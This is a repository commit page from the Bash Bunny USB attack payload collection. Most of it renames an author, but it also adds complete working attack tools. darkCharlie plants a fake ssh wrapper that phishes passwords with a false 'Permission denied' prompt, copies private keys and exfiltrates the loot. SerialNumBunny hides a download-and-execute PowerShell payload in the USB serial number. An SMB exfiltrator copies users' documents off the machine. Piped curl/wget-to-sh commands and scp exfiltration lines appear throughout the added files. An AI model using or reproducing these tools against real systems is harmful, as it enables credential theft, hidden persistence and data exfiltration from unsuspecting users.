hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

Browse Source
This commit is contained in:
Quentin Lamamy
2024-09-02 04:35:16 +02:00
committed by GitHub
parent 5cfae30936 36f116eed7
commit a57046358b
63 changed files with 2500 additions and 57 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
payloads/library/credentials/FireSnatcher/README.md
View File

@@ -1,7 +1,7 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)

2
payloads/library/credentials/FireSnatcher/payload.txt
View File

@@ -1,7 +1,7 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Props: saintcrossbow & 0i41E
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)

4
payloads/library/credentials/HashDumpBunny/README.md
View File

@@ -1,6 +1,6 @@
**Title: HashDumpBunny**
Author: 0iphor13
Author: 0i41E
Version: 1.0
@@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
#
Plug in BashBunny.
Exfiltrate the out.txt file and try to crack the hashes.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)

2
payloads/library/credentials/HashDumpBunny/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: HashDumpBunny
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

4
payloads/library/credentials/MiniDumpBunny/README.md
View File

@@ -1,6 +1,6 @@
**Title: MiniDumpBunny**
Author: 0iphor13
Author: 0i41E
Version: 1.0
@@ -14,4 +14,4 @@ What is MiniDumpBunny?
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
#
Exfiltrate the .dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)

2
payloads/library/credentials/MiniDumpBunny/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: MiniDumpBunny
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

8
payloads/library/credentials/ProcDumpBunny/README.md
View File

@@ -1,6 +1,6 @@
**Title: ProcDumpBunny**
Author: 0iphor13
Author: 0i41E
Version: 1.0
@@ -12,10 +12,10 @@ What is ProcDumpBunny?
**Instruction:**
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
Place Bunny.exe in the same payload switch as your payload
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
#
Plug in BashBunny.
Exfiltrate the out.dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)

2
payloads/library/credentials/ProcDumpBunny/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: ProcDumpBunny
# Description: Dump lsass.exe with a renamed version of procdump
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

4
payloads/library/credentials/SamDumpBunny/README.md
View File

@@ -1,6 +1,6 @@
**Title: SamDumpBunny**
<p>Author: 0iphor13<br>
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
@@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

2
payloads/library/credentials/SamDumpBunny/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

4
payloads/library/credentials/SessionBunny/README.md
View File

@@ -1,6 +1,6 @@
**Title: SessionBunny**
Author: 0iphor13
Author: 0i41E
(Credit for SessionGopher: Brandon Arvanaghi)
Version: 1.0
@@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
#
Plug in BashBunny.
Wait for the script to finish and decide what you wanna do with the information gathered
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)

2
payloads/library/credentials/SessionBunny/SessionBunny.ps1
View File

@@ -43,7 +43,7 @@
o
o_
/ ". SessionGopher
," _-" Bunny Edition (0iphor13)
," _-" Bunny Edition (0i41E)
," m m
..+ ) Brandon Arvanaghi
`m..m @arvanaghi | arvanaghi.com

2
payloads/library/credentials/SessionBunny/payload.txt
View File

@@ -1,7 +1,7 @@
#!/bin/bash
#
# Title: SessionBunny
# Author: 0iphor13
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage

74
payloads/library/credentials/darkCharlie/cleaner/payload.txt Normal file
View File

@@ -0,0 +1,74 @@
#!/bin/bash
# Title: darkCharlie{Cleaner}
# Author: Michael Weinstein
# Target: Mac/Linux
# Version: 0.1
#
# Get the ssh creds from our loot collection.
# And clean up after
#
# White | Ready
# Blue blinking | Attacking
# Green | Finished
LED SETUP
#setup the attack on macos (if false, attack is for Linux)
mac=false
if [ "$mac" = true ]
then
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
LOOT=/root/udisk/loot/darkCharlie
mkdir -p $LOOT
LED ATTACK
if [ "$mac" = true ]
then
RUN OSX terminal
else
RUN UNITY xterm
fi
QUACK DELAY 2000
QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.$HOSTNAME.ssh.passwd.json #nice hiding of known host info
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 500
QUACK STRING hak5bunny
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 500
if [ "$mac" = true ]
then
QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile #macs really seem to hate it when you sed in place, I think.
QUACK ENTER
QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\""
else
QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
fi
QUACK ENTER
QUACK DELAY 200
if [ "$mac" = true ]
then
QUACK DELAY 2000
QUACK GUI w
else
QUACK STRING exit
QUACK DELAY 200
QUACK ENTER
fi
LED SUCCESS
#See you, space cowboy...

415
payloads/library/credentials/darkCharlie/injector/darkCharlie.py Normal file
View File

@@ -0,0 +1,415 @@
#! PYTHON_EXECUTABLE_GOES_HERE
'''
Dark Charlie remote shell cred grabber
Version 0.1
Using open-ended exceptions here to maintain silence when errors happen
'''
originalSSHExecutable = "ORIGINAL_SSH_EXE_GOES_HERE"
def cantLoadModuleError():
import sys
if sys.version_info.major < 3:
return ImportError
if sys.version_info.minor < 6:
return ImportError
else:
return ModuleNotFoundError
def getLootFileName():
import os
thisFullPath = os.path.abspath(__file__)
thisDirectory = os.path.split(thisFullPath)[0]
lootFile = thisDirectory + os.sep + "ssh.conf"
return os.path.join(lootFile)
def initializeThisScript():
'''This function will be run the first time by the bunny'''
import subprocess
import re
pathFinder = subprocess.Popen("which python".split(), stdout = subprocess.PIPE)
pythonExecutable = pathFinder.stdout.read().strip()
pathFinder = subprocess.Popen("which ssh".split(), stdout = subprocess.PIPE)
sshExecutable = pathFinder.stdout.read().strip()
try:
import paramiko
except cantLoadModuleError():
try:
paramikoInstaller = subprocess.Popen("pip install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
paramikoInstaller = subprocess.Popen("pip3 install --user paramiko".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
except:
pass
try:
import json
except cantLoadModuleError():
try:
jsonInstaller = subprocess.Popen("pip install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
jsonInstaller = subprocess.Popen("pip3 install --user json".split(), stdout = subprocess.PIPE, stderr = subprocess.PIPE)
except:
pass
try:
import getpass
except:
try:
getPassInstaller = subprocess.Popen("pip install --user getpass", stdout = subprocess.PIPE, stderr = subprocess.PIPE)
except:
pass
thisFileName = __file__
thisFile = open(thisFileName, 'r')
originalCode = thisFile.read()
thisFile.close()
newCode = re.sub("PYTHON_EXECUTABLE_GOES_HERE", pythonExecutable, originalCode, 1)
newCode = re.sub("ORIGINAL_SSH_EXE_GOES_HERE", sshExecutable, newCode, 1)
thisFile = open(thisFileName, 'w')
thisFile.write(newCode)
thisFile.close()
createLootFile(getLootFileName())
quit()
def createLootFile(lootFileName):
import json
initialData = {"configFiles":{}, "passwords":{}}
addDefaultSSHConfigFilesToLoot(initialData)
lootFile = open(lootFileName, 'w')
json.dump(initialData, lootFile)
lootFile.close()
def addDefaultSSHConfigFilesToLoot(lootData): #using lootData as a reference here, no returns
mainConfigData, userConfigData = analyzeDefaultSSHConfigFiles()
mainConfigHash, mainData = mainConfigData
userConfigHash, userData = userConfigData
lootData["configFiles"][mainConfigHash] = mainData
lootData["configFiles"]["main"] = mainData
lootData["configFiles"][userConfigHash] = userData
lootData["configFiles"]["user"] = userData
def analyzeDefaultSSHConfigFiles():
import os
try:
mainConfigData = analyzeConfigFile("/etc/ssh/ssh_config")
if mainConfigData:
mainFileHash, mainData = mainConfigData
else:
mainFileHash = None
mainData = None
except:
mainFileHash = None
mainData = None
try:
userConfigFileName = os.getenv("HOME") + "/.ssh/config"
userConfigData = analyzeConfigFile(userConfigFileName)
if userConfigData:
userFileHash, userData = userConfigData
else:
userFileHash = None
userData = None
except:
userFileHash = None
userData = None
return ((mainFileHash, mainData), (userFileHash, userData))
def loadLootFile(lootFileName):
import json
try:
file = open(lootFileName, 'r')
data = json.load(file)
file.close()
return data
except:
return False
def saveLootFile(loot, lootFileName):
import json
try:
file = open(lootFileName, 'w')
json.dump(loot, file)
file.close()
except:
pass
class SSHArgHandler(object):
def __init__(self, rawArgList):
self.password = None
self.optionsDict = self.getOptionsDict(rawArgList)
self.keyFileName = self.findArgument("-i", rawArgList)
if self.keyFileName:
self.keyFile = snarfKeyFile(self.keyFileName)
else:
self.keyFile = None
self.configFile = self.findArgument("-F", rawArgList)
if self.configFile:
configFileInfo = analyzeConfigFile(self.configFile)
else:
configFileInfo = None
if configFileInfo:
self.configFileHash, self.configFileDict = configFileInfo
else:
self.configFileHash = None
self.configFileDict = None
self.host = rawArgList[-1]
if "@" in self.host:
self.host = self.host.split("@")[-1]
self.port = self.findArgument("-p", rawArgList)
self.user = self.findUserName(rawArgList)
self.commandOptions = " ".join(rawArgList[1:])
self.intendedCommand = originalSSHExecutable + " " + self.commandOptions
def findUserName(self, args):
user = self.findArgument("-l", args)
if not user:
if "@" in args[-1]:
user = args[-1].split("@")[0]
if not user:
if "User" in self.optionsDict:
user = self.optionsDict["User"]
if not user:
if self.configFileDict and self.host in self.configFileDict:
if "User" in self.configFileDict[self.host]:
user = self.configFileDict[self.host]["User"]
if not user:
return "None"
return user
def getOptionsDict(self, args):
interestingArgs = args[1:-1]
options = {}
for i in range(len(interestingArgs)):
rawOption = None
if interestingArgs[i].startswith("-o"):
if len(interestingArgs[i]) > 2:
rawOption = interestingArgs[i][2:]
elif i == len(interestingArgs) - 1: #somebody probably messed up the command
continue
else:
rawOption = interestingArgs[i + 1]
if rawOption:
optionList = rawOption.split("=")
if len(optionList) == 2:
key, value = optionList
options[key] = value
return options
def findArgument(self, argOfInterest, args): #this assumes the argument of interest should only show up in the command once
interestingArgs = args[1:-1]
for i in range(len(interestingArgs)):
if interestingArgs[i].startswith(argOfInterest):
if len(interestingArgs[i]) > 2 and not argOfInterest.startswith("--"):
value = interestingArgs[i][2:]
elif i == len(interestingArgs) - 1: #ten bucks says this probably won't run
continue
else:
return interestingArgs[i + 1]
return None
def saveData(self):
infoDict = {}
if self.password:
infoDict["password"] = self.password
if self.optionsDict:
infoDict["options"] = self.optionsDict
if self.keyFile:
infoDict["privateKey"] = self.keyFile
if self.host:
infoDict["host"] = self.host
if self.port:
infoDict["port"] = self.port
if self.user:
infoDict["user"] = self.user
return infoDict
def analyzeConfigFile(configFileName): #The tat rolled a 20?
import os
import re
regexSplitter = re.compile("[\s\=]")
if not os.path.isfile(configFileName):
return False
file = open(configFileName, 'r')
data = file.read()
file.close()
fileHash = hash(data)
data = data.split("\n")
currentHostNickname = "None"
hostDict = {}
for line in data:
line = line.strip()
if not line:
continue
if line.startswith("#"):
continue
if line.startswith("Host") and line.split()[0] == "Host":
hostLine = re.split(regexSplitter, line)
if len(hostLine) > 1:
currentHostNickname = hostLine[1]
else:
currentHostNickname = "None"
if not currentHostNickname in hostDict:
hostDict[currentHostNickname] = {}
continue
lineSplit = re.split(regexSplitter, line)
if len(lineSplit) == 1:
hostDict[currentHostNickname][lineSplit[0]] = "None"
else:
key = lineSplit[0]
value = " ".join(lineSplit[1:])
try:
if key == "IdentityFile":
keyRead = snarfKeyFile(value)
if not keyRead:
value += "(FILENOTFOUND)"
else:
value = keyRead
except:
value = "UnableToLoad"
hostDict[currentHostNickname][key] = value
return (fileHash, hostDict)
def snarfKeyFile(keyFileName):
import os
import base64
if not os.path.isfile(keyFileName):
return False
keyFile = open(keyFileName, 'rb')
key = keyFile.read()
keyFile.close()
return base64.b64encode(key).decode()
def paramikoSaysWeNeedAPassword(host, port, user):
try:
import paramiko
except cantLoadModuleError():
return True #default to true if we can't check it
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
ssh.connect(host, port = int(port), username = user)
ssh.close()
return False
except paramiko.ssh_exception.SSHException:
try:
ssh.connect(host, port = int(port), username = user, password = "12345") #probably not their real password unless they're an idiot and this is their luggage
ssh.close()
return False
except paramiko.ssh_exception.AuthenticationException:
return True
except:
return False
def paramikoApprovesOfThisPassword(host, port, user, password):
try:
import paramiko
except cantLoadModuleError():
return True #default to true if we can't check it
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
ssh.connect(host, port = int(port), username = user, password = password) #hopefully their real password
ssh.close()
return True
except paramiko.ssh_exception.AuthenticationException:
return False
def parseArguments():
import sys
argList = sys.argv
if "--initializeScript" in sys.argv:
initializeThisScript()
else:
return argList
def findHostInLootConfigs(lootFileData, host):
for fileHash in lootFileData["configFiles"]:
if lootFileData["configFiles"][fileHash] and host in lootFileData["configFiles"][fileHash]: #have to check if there is even file data there, otherwise we end up indexing into nothing and failing hard
return lootFileData["configFiles"][fileHash][host]
return None
def getUserName():
import getpass
return getpass.getuser()
def lowDownDirtyDeceiver(user, hostAddress):
import getpass
prompt = "%s@%s's password: " %(user, hostAddress)
password = getpass.getpass(prompt)
print("Permission denied, please try again.")
return password
def shinyLetsBeBadGuys():
argList = parseArguments()
lootFileData = loadLootFile(getLootFileName())
sshArgs = SSHArgHandler(argList)
if sshArgs.configFileHash:
lootFileData["configFiles"][sshArgs.configFileHash] = sshArgs.configFileDict
addDefaultSSHConfigFilesToLoot(lootFileData)
hostConfigFileData = findHostInLootConfigs(lootFileData, sshArgs.host)
hostAddress = sshArgs.host
userName = None
hostPort = None
password = None
if lootFileData["configFiles"]["main"]:
if "HostName" in lootFileData["configFiles"]["main"]:
hostAddress = lootFileData["configFiles"]["main"]["HostName"]
if "Port" in lootFileData["configFiles"]["main"]:
hostPort = lootFileData["configFiles"]["main"]["Port"]
if "IdentityFile" in lootFileData["configFiles"]["main"]:
password = "file(%s)" %lootFileData["configFiles"]["main"]["IdentityFile"]
if lootFileData["configFiles"]["user"]:
if "HostName" in lootFileData["configFiles"]["user"]:
hostAddress = lootFileData["configFiles"]["user"]["HostName"]
if "Port" in lootFileData["configFiles"]["user"]:
hostPort = lootFileData["configFiles"]["user"]["Port"]
if "IdentityFile" in lootFileData["configFiles"]["user"]:
password = "file(%s)" %lootFileData["configFiles"]["user"]["IdentityFile"]
if hostConfigFileData:
if "HostName" in hostConfigFileData:
hostAddress = hostConfigFileData["HostName"]
if "Port" in hostConfigFileData:
hostPort = hostConfigFileData["Port"]
if "IdentityFile" in hostConfigFileData:
password = "file(%s)" %hostConfigFileData["IdentityFile"]
if sshArgs.user:
userName = sshArgs.user
if sshArgs.port:
hostPort = sshArgs.port
if sshArgs.keyFile:
password = "file(%s)" %sshArgs.keyFile
if not userName:
try:
userName = getUserName()
except:
userName = "DefaultUserName"
if not hostPort:
hostPort = "22"
hostInfo = "%s@%s:%s" %(userName, hostAddress, hostPort) # user@hostAddress:port
if not password:
if not hostInfo in lootFileData["passwords"]:
gotValidPass = False
while not gotValidPass:
try:
password = lowDownDirtyDeceiver(userName, hostAddress)
except:
password = "FailedToObtain"
break
try:
gotValidPass = paramikoApprovesOfThisPassword(hostAddress, hostPort, userName, password)
except:
break
lootFileData["passwords"][hostInfo] = [password, sshArgs.intendedCommand, sshArgs.saveData()] #json doesn't do tuples anyway
saveLootFile(lootFileData, getLootFileName())
if __name__ == '__main__':
import os
args = parseArguments()
intendedCommand = args[:]
intendedCommand[0] = originalSSHExecutable
intendedCommand = " ".join(intendedCommand)
try:
if len(args) > 1:
shinyLetsBeBadGuys()
except: #I really feel weird doing a massive open-ended exception here... but silence
pass
os.system(intendedCommand)
quit()

101
payloads/library/credentials/darkCharlie/injector/payload.txt Normal file
View File

@@ -0,0 +1,101 @@
#!/bin/bash
# Title: darkCharlie
# Author: Michael Weinstein
# Target: Mac/Linux
# Version: 0.1
#
# Create a wrapper for ssh sessions that
# will live inside ~/.config/ssh and be added
# tn the $PATH.
#
# This payload was inspired greatly by SudoBackdoor
# and much of the code here was derived (or copied
# wholesale) from that with great thanks to oXis.
#
# White | Ready
# Amber blinking | Waiting for server
# Blue blinking | Attacking
# Green | Finished
LED SETUP
#setup the attack on macos (if false, attack is for Linux)
mac=false
if [ "$mac" = true ]
then
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening (credit audibleblink)
while ! nc -z localhost 80; do sleep 0.2; done
# that was brilliant!
LED ATTACK
if [ "$mac" = true ]
then
RUN OSX terminal
else
RUN UNITY xterm
fi
QUACK DELAY 2000
if [ "$mac" = true ]
then
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh"
QUACK ENTER
QUACK DELAY 200
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING python "~/.config/ssh/ssh" --initializeScript
QUACK ENTER
QUACK DELAY 200
else
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" #Will test this on a mac when I finish up
QUACK DELAY 200
QUACK ENTER
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
QUACK DELAY 200
QUACK ENTER
QUACK STRING python "~/.config/ssh/ssh" --initializeScript
QUACK DELAY 200
QUACK ENTER
fi
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 200
if [ "$mac" = true ]
then
QUACK DELAY 5000 #seems like macs need some extra time on this
QUACK GUI w
else
QUACK STRING exit
QUACK DELAY 200
QUACK ENTER
fi
LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20

10
payloads/library/credentials/darkCharlie/injector/post.sh Normal file
View File

@@ -0,0 +1,10 @@
#!/bin/bash
chmod u+x ~/.config/ssh/ssh
if [ -f ~/.bash_profile ]
then
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
else
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
fi

11
payloads/library/credentials/darkCharlie/injector/pre.sh Normal file
View File

@@ -0,0 +1,11 @@
#!/bin/bash
if [ ! -d ~/.config/ssh ]
then
mkdir -p ~/.config/ssh
fi
if [ -f ~/.config/ssh/ssh ]
then
rm ~/.config/ssh/ssh
fi

36
payloads/library/credentials/darkCharlie/readme.md Normal file
View File

@@ -0,0 +1,36 @@
# darkCharlie SSH credential grabber
* Author: Michael Weinstein
* Version: 0.1
* Target: Mac/Linux
Mad credit to oXis for their attack approach. Much of the code here was developed using SudoBackdoor as a reference.
Current dev status: I have tested this with both private key and password auth on a linux machine and found it working. I have not extensively tested with config files, but the limited testing I have done suggests that it is working as intended. I have not tested yet on a mac, but will probably do so very soon. I still need to do some more polishing on this, and especially want to get the use of paramiko better where it can check if the login needs a password and then check if the password entered into the wrapper is valid.
## Description
Injector: Creates a folder called ~/.config/ssh where it puts a python wrapper for ssh. Next, it copies over the python SSH wrapper. It then runs the initialization function in the wrapper script to set some environmental values like the actual path for SSH and the path for python. The initialization function also initializes a file for saving SSH creds and configuration details in JSON format. It will save the global and user SSH config file details immediately, including grabbing any private keys linked in the config file (if you know these will be of interest, you can exfiltrate them immediately). Finally, ~/.config/ssh is added as the first element on the user's PATH so that they will be running this wrapper instead of actually SSHing in. The main abnormality a user will see is if they need to manually enter a password, they'll get it "wrong" the first time and have to reenter it. This wrapper will load previous loot to see if a server's password has already been gotten and won't try to get it again to avoid raising suspicions.
Cleaner: Gets back the file containing JSON-encoded SSH configuration and credential data. After exfiltration of the data, it will delete the directory and files it created and clean up its change to the bashrc or bash_profile.
## Configuration
Inside the injector and the cleaner you can specify mac=true to switch the playload to macos mode.
## STATUS (Note that I used the same configuration as SudoBackdoor, but I am seeing different LED behaviors. Will investigate this soon.)
Injector
| LED | Status |
| ---------------- | -------------------- |
| White | Ready |
| Amber blinking | Waiting for server |
| Blue blinking | Attacking |
| Green | Finished |
Cleaner
| LED | Status |
| ---------------- | -------------------- |
| White | Ready |
| Blue blinking | Attacking |
| Green | Finished |

15
payloads/library/execution/SerialNumBunny/1.PS1 Normal file
View File

@@ -0,0 +1,15 @@
#This is just an example script, you may want to replace it with a script of your choice
$Picture=@"
_____ _____ _____ _____ _____ _____ _____ _____ __ __
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
Bash Bunny by Hak5 USB Attack/Automation Platform
"@
Sleep -s 5
Write-Host -ForegroundColor red "$Picture"
Sleep -s 2
Write-Host -ForegroundColor green "SerialNumBunny by 0i41E"

BIN
payloads/library/execution/SerialNumBunny/SerialNumBunny.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

46
payloads/library/execution/SerialNumBunny/payload.txt Normal file
View File

@@ -0,0 +1,46 @@
#!/bin/bash
#
# Title: SerialNumBunny
# Description: Execute strings placed in the Bunny serial number
# Author: 0i41E
# Version: 1.0
# Category: Execution
# Attackmodes: HID, RNDIS_ETHERNET
# Starting as Ethernet device only first to get IP
LED SETUP
ATTACKMODE RNDIS_ETHERNET
GET SWITCH_POSITION
GET HOST_IP
# Switch to Ethernet & HID
LED Y
# Defining Device Identifiers - Serialnumber contains payload
ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell"
Q DELAY 500
Q ENTER
Q DELAY 1000
# Make sure that device ID matches what was defined above
Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
Q DELAY 400
Q ENTER
LED FINISH

19
payloads/library/execution/SerialNumBunny/readme.md Normal file
View File

@@ -0,0 +1,19 @@
**Title: SerialNumBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
**What is SerialNumBunny?**
*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
**Instruction:**
- Upload your script or the example provided onto your Bunnys switch folder.
- Plug in the Bunny and let the magic happen.
![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226)
_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._

2
payloads/library/exfiltration/WifiSnatch/payload.txt
View File

@@ -2,7 +2,7 @@
#
# Title: WifiSnatch
# Description: Extract wifi information, such as passphrases & SSIDs
# Author: 0iphor13
# Author: 0i41E
# Version: 1.1
# Category: Exfiltration
# Attackmodes: HID, Storage

50
payloads/library/exfiltration/smb_exfiltratorV2.0/README.md Normal file
View File

@@ -0,0 +1,50 @@
# Faster SMB Exfiltrator V 2.0
* Author: Hak5Darren
* Props: ImNatho, mike111b, madbuda, jblk01
* Version: Version 1.6.1
* Target: Windows XP SP3+ (Powershell)
* Category: Exfiltration
* Attackmodes: HID, Ethernet
## Description
Exfiltrates select files from users's documents folder via SMB.
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
## Configuration
Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
## STATUS
| LED | Status |
| ------------------- | -------------------------------------- |
| Red (blinking) | Impacket not found in /pentest |
| Yellow Single | Ethernet Stage |
| Yellow Double | HID Stage |
| Cyan | Receiving files |
| White | Moving liberated files to mass storage |
| Green | Finished |
# NOTICE
As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
# Starting from a fresh Bash Bunny
1. apt update ; apt install gcc
2. pip install impacket
3. cd /tools/
4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
Both the username and the password have been set as 'user' and 'Password01' respectively.
# Changes to the payload.txt include:
* Support for SMB version 2 enabled.
* Username and password set to bypass Microsoft's disallowing of anonymous access.
* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.

85
payloads/library/exfiltration/smb_exfiltratorV2.0/payload.txt Normal file
View File

@@ -0,0 +1,85 @@
#!/bin/bash
#
# Title: Faster SMB Exfiltrator version 2.0
# Author: Hak5Darren
# Props: ImNatho, mike111b, madbuda, jblk01
# Version: 1.6.1
# Category: Exfiltration
# Target: Windows XP SP3+ (Powershell)
# Attackmodes: HID, Ethernet
#
# REQUIREMENTS
# ============
# SETUP:
#
# 1. apt update ; apt install gcc
# 2. pip install impacket
# 3. cd /tools/
